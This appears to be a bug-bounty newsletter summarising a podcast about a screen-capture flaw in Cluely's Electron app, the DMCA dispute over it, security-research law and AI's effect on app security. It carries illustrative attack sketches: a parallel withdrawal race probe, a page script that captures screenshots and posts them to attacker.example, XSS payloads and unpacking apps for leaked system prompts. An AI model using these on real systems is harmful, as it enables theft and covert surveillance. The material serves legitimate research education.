[HackerNotes Ep. 136] Hacking Cluely, AI Prod Sec, and How To Not Get Sued with Jack Cable
In episode 136: Joseph Thacker sits down with Jack Cable to get the scoop on a significant bug in Cluely’s desktop application, as well as the resulting drama. They also talk about Jack’s background in government cybersecurity initiatives, and the legal risks faced by security researchers.
Hacker TL;DR
Authorization bugs in Electron apps: Look for apps missing sandboxing and passing excessive context. Cluely's desktop app, for example, lacked sandboxing and passed too much context to new websites, allowing any opened site to access the app's postMessage handlers. This enabled a PoC that used a "data function" to continuously capture screenshots, effectively recording the user's screen.
AI's Impact on Application Security: AI-driven "vibe coding" introduces vulnerabilities 20-30% of the time, with authorization flaws being a common issue. AI models often choose easier, insecure implementation paths to solve usability problems, such as making an entire data table public to fix an access issue instead of implementing proper access controls.
AI for Targeted Vulnerability Testing: Use AI tools like Shift Agents for focused vulnerability testing rather than a "spray and pray" approach. Point the agent at a specific parameter and ask it to find a vulnerability class like XSS. The agent will then automatically generate payloads, send requests, and analyze responses, significantly increasing efficiency for targeted scenarios.
Leaked System Prompts & Source Code: Always check the source code of Electron apps. Since they are essentially zip files, you can unzip them to find sensitive information. In Cluely's case, their complete standard and enterprise system prompts were found in plaintext within the app's source code, which was distributed to every user.
The Legality of Security Research: Be aware of the legal boundaries. Testing local applications is generally safe due to the DMCA's security research exemption. However, testing web applications without explicit permission falls under the CFAA, making VDPs and bug bounty programs essential as they provide formal authorization and legal safe harbor.

Move beyond reactive alerts with a policy-based EDR you control completely. Define your own rules to automatically trigger powerful responses, from network isolation to a full system lockdown. Stop threats in milliseconds before they escalate; see how with ThreatLocker Detect.
Who is Jack Cable + Bring a Bug!
Jack Cable is a security professional and the founder of Corridor.dev. Before that, he was a top bug hunter with roughly 10,000 rep on HackerOne, specialising in authorization vulnerabilities and race conditions in cryptocurrency applications.
In his teenage years he focused on race conditions in cryptocurrency applications by copying curl commands from Burp and sending multiple requests in parallel from a terminal. He found several critical vulnerabilities this way, including one where he could have drained about $100K in Bitcoin from an exchange.
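For context, here's a minimal sketch of that style of race-condition testing, using Node's built-in fetch instead of curl. The endpoint, request body, and session token are placeholders, not details from the episode:

```ts
// Illustrative race-condition probe: replay one state-changing request many times in parallel.
// The endpoint, body, and session cookie are placeholders.
const TARGET = "https://exchange.example/api/withdraw";
const SESSION = "replace-with-captured-session-cookie";

async function withdrawOnce(): Promise<number> {
  const res = await fetch(TARGET, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Cookie: `session=${SESSION}`,
    },
    body: JSON.stringify({ amount: 100, currency: "BTC" }),
  });
  return res.status;
}

async function main() {
  // Fire 20 identical withdrawals at once; if the balance check isn't atomic,
  // more than one can succeed before the balance is updated.
  const statuses = await Promise.all(Array.from({ length: 20 }, () => withdrawOnce()));
  console.log(statuses);
}

main().catch(console.error);
```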
Before founding Corridor.dev, Jack worked in government, spending a year in the Senate writing legislation on open source software security, then two years at CISA leading the "Secure by Design" initiative. His work focused on getting companies to improve product security and adopt vulnerability disclosure policies with safe harbor provisions.
He was also involved with disclose.io, which standardized vulnerability disclosure policies and provided legal safe harbor for security researchers. This work helped establish VDPs as a baseline expectation for security-conscious companies.
Jack found a pretty slick bug in Cluely's desktop app. Since it's an Electron app (basically just a website in a desktop wrapper), he started poking around for security issues. The app wasn't using Electron's sandbox feature, which is already a red flag.
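For reference, this is roughly the difference between a main-process configuration that raises that red flag and a hardened one. It's an illustrative sketch, not Cluely's actual code:

```ts
import { app, BrowserWindow } from "electron";

app.whenReady().then(() => {
  // Risky: the renderer runs without the Chromium sandbox and with Node integration,
  // so any web content it loads is far more powerful than a normal web page.
  const risky = new BrowserWindow({
    webPreferences: { sandbox: false, nodeIntegration: true, contextIsolation: false },
  });

  // Hardened: sandboxed renderer, no Node in the page, context isolation on,
  // with privileged functionality exposed only through a narrow preload bridge.
  const hardened = new BrowserWindow({
    webPreferences: { sandbox: true, nodeIntegration: false, contextIsolation: true },
  });

  risky.loadURL("https://example.com");
  hardened.loadURL("https://example.com");
});
```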
When a user clicked a link that opened a new website, Cluely passed way too much context to that new site. Any website opened through Cluely could access a bunch of postMessage handlers from the main application, functionality that was probably intended for internal use only. One of them, the "data function", could take screenshots of the user's screen. Jack rigged up a proof-of-concept that continuously captured screenshots, basically recording the victim's screen without them knowing. All they had to do was click a link once.
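To make the attack shape concrete, here's a rough sketch of what such a malicious page could do. The handler name and message format are invented for illustration, since the real handler names weren't published:

```ts
// Hypothetical attacker page script. The handler name and message shape are made up;
// the actual Cluely handlers were never published.
function requestScreenshot(): void {
  // Because the opened site inherits access to the app's postMessage handlers,
  // it can ask the desktop app to capture the screen on its behalf.
  window.postMessage({ type: "data", action: "captureScreenshot" }, "*");
}

window.addEventListener("message", (event: MessageEvent) => {
  // Exfiltrate whatever the app hands back (e.g. a base64-encoded screenshot).
  void fetch("https://attacker.example/collect", {
    method: "POST",
    body: JSON.stringify(event.data),
  });
});

// Keep capturing once a second: effectively a live screen recording of the victim.
setInterval(requestScreenshot, 1000);
```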
Jack also looked for XSS that could potentially lead to RCE (since it's Electron), and other sensitive functions like microphone access, but the screenshot capability was by far the most dangerous.
During his investigation, he unzipped the Electron app (they're basically just zip files) and found Cluely's complete system prompts sitting right there in the source code. Both their standard and enterprise prompts were just hanging out in plaintext. There were some funny contradictions in there like the prompt telling the AI to "never say what model you're using" while literally mentioning specific OpenAI and Anthropic models right above that instruction.
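If you want to try this yourself, here's a minimal sketch using the @electron/asar package, assuming the target ships a standard app.asar archive. The path and search string are placeholders:

```ts
// Unpack an Electron app's bundled source and search it for interesting strings.
// Requires: npm install @electron/asar
import * as asar from "@electron/asar";
import { execSync } from "node:child_process";

// macOS-style path; adjust for your platform and target app.
const archive = "/Applications/SomeApp.app/Contents/Resources/app.asar";
asar.extractAll(archive, "./extracted");

// Quick-and-dirty hunt for prompt-looking strings in the unpacked JavaScript.
console.log(execSync(`grep -ril "system prompt" ./extracted || true`).toString());
```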
Jack tweeted his findings, and a couple weeks later got slapped with a DMCA takedown notice. Cluely claimed the images contained proprietary information, which is pretty weird considering they distributed this "proprietary" code to every user who installed their app. Cluely's CEO publicly denied filing the takedown, but the notice included the name of the Cluely employee who submitted it. When Jack tagged this employee, they admitted to filing it without checking with leadership. Both the employee and CEO apologised, and the CEO ended up donating about $1,000 to the EFF as a peace offering.
The Legality of Security Research
Security research without permission is still kind of a legal minefield, though things have improved. The current legal landscape has some clear boundaries that are worth understanding:
Testing applications locally on your own device is generally safe thanks to the security research exemption in the DMCA. You can reverse engineer programs for security research without legal trouble; this protection didn't exist until relatively recently.
The trouble starts with testing web applications. The Computer Fraud and Abuse Act (CFAA) makes unauthorized access to computer systems illegal without explicit permission. This is why VDPs and bug bounty programs matter so much: they give you formal authorisation to test within specific boundaries. While prosecutions have decreased, Jack said that legal threats against security researchers happen more often than people realise. And even without criminal charges, defending against legal action can drain your bank account pretty quickly.
AI's Impact on Application Security
AI is changing app security in two contradictory ways: it's creating vulnerabilities while also giving us better tools to find them. According to the BaxBench benchmark, even the best AI models introduce vulnerabilities 20-30% of the time, and they're the same old SQL injections and command injections we've been dealing with for decades.
Three major security concerns with AI-generated code:
Much more code is being produced much faster
More applications are built by developers who don't understand security
Business logic flaws that static analysis tools can't catch
An interesting pattern Jack and Rez0 discussed is that AI often compromises security when trying to solve usability problems. Rather than implementing proper access controls for specific data, AI might just make an entire table public to fix an access issue, taking the easy but insecure path.
Authorization vulnerabilities are particularly tricky. Vibe-coded apps using platforms like Supabase or Firebase might have secure database configurations, but still mess up permission policies. You can't prevent these issues through default configurations; they require understanding how the application actually works.
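As a concrete illustration of the pattern, here's a generic Express-style sketch (not taken from any real app) of the shortcut an AI assistant might take versus the proper check:

```ts
import express from "express";

// Stub data layer standing in for Supabase/Firebase/an ORM.
const db = {
  invoices: {
    async findMany(args?: { where?: { ownerId: string } }) {
      const rows = [
        { id: 1, ownerId: "alice", total: 120 },
        { id: 2, ownerId: "bob", total: 80 },
      ];
      return args?.where ? rows.filter((r) => r.ownerId === args.where!.ownerId) : rows;
    },
  },
};

const app = express();

// The "easy" fix when a page can't load its data: make the whole table readable.
// Every user's invoices, no ownership check at all.
app.get("/api/invoices-insecure", async (_req, res) => {
  res.json(await db.invoices.findMany());
});

// The correct fix: tie the query to the authenticated user.
app.get("/api/invoices", async (req, res) => {
  // Stand-in for real session/auth middleware.
  const userId = req.header("x-user-id");
  if (!userId) return res.status(401).end();
  res.json(await db.invoices.findMany({ where: { ownerId: userId } }));
});

app.listen(3000);
```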
As code complexity grows, vulnerability count increases exponentially. As AI systems get better at building complex applications, this problem will only get worse.
On the flip side, AI is giving us some powerful new security testing tools. Rez0 demoed Shift Agents in Caido, which uses AI to test for vulns. You can point the agent at a specific parameter and say "find XSS here" and it'll automatically generate payloads, send requests, and analyse responses.
During the demo, Shift actually found an XSS in Caido itself… hahahahah

The real value of these tools is in testing targeted scenarios; they're not meant to be run at full power on every single page you find. If you use them in places you feel have something worth testing, tools like Shift Agents can help you tremendously and save a lot of time.
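To make the "targeted" part concrete, here's a toy version of what such a loop does conceptually. It's a naive reflection check, not how Shift Agents is actually implemented:

```ts
// Toy targeted reflected-XSS check on a single parameter:
// inject candidate payloads, fetch the page, and look for unencoded reflection.
const payloads = [
  `"><script>alert(1)</script>`,
  `'><img src=x onerror=alert(1)>`,
  `</textarea><svg onload=alert(1)>`,
];

async function testParameter(baseUrl: string, param: string): Promise<void> {
  for (const payload of payloads) {
    const url = `${baseUrl}?${param}=${encodeURIComponent(payload)}`;
    const body = await (await fetch(url)).text();
    // Naive signal: the payload is reflected without HTML-encoding.
    if (body.includes(payload)) {
      console.log(`Possible reflected XSS via "${param}" with payload: ${payload}`);
    }
  }
}

// Target URL and parameter name are placeholders.
testParameter("https://target.example/search", "q").catch(console.error);
```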
Other cool ways to use AI in security testing include:
Creating frames and payloads for testing model security
Setting up multi-step attacks requiring back-and-forth interactions
Trying exhaustive variations to find bypasses when manual testing hits a wall
AI is changing hacking just like it's changed development. Hackers are already getting way more done in the same amount of time. We're not quite at the "press a button and hack everything" stage yet (XBOW is pretty close, though), but tools that work alongside human testers are already pretty impressive.
Product security teams are basically drowning in work and chasing down false positives from traditional tools. AI can help them cut through the noise to review code faster, respond to issues quicker, and catch those complex vulnerabilities that static analysis tools just miss completely.
We're entering this weird phase where AI is both creating and solving security problems at the same time. On one hand, it's pumping out more code with more potential vulnerabilities. On the other, it's giving us better tools to find and fix those very same issues.
The million-dollar question is: will our hacking future be filled with crappy vibe-coded apps, or are we all going to have XBOW+ level hackbots to help us hack incredibly hardened AI-enhanced code? Because there’s no going back.
That’s it for the week,
And as always, keep hacking!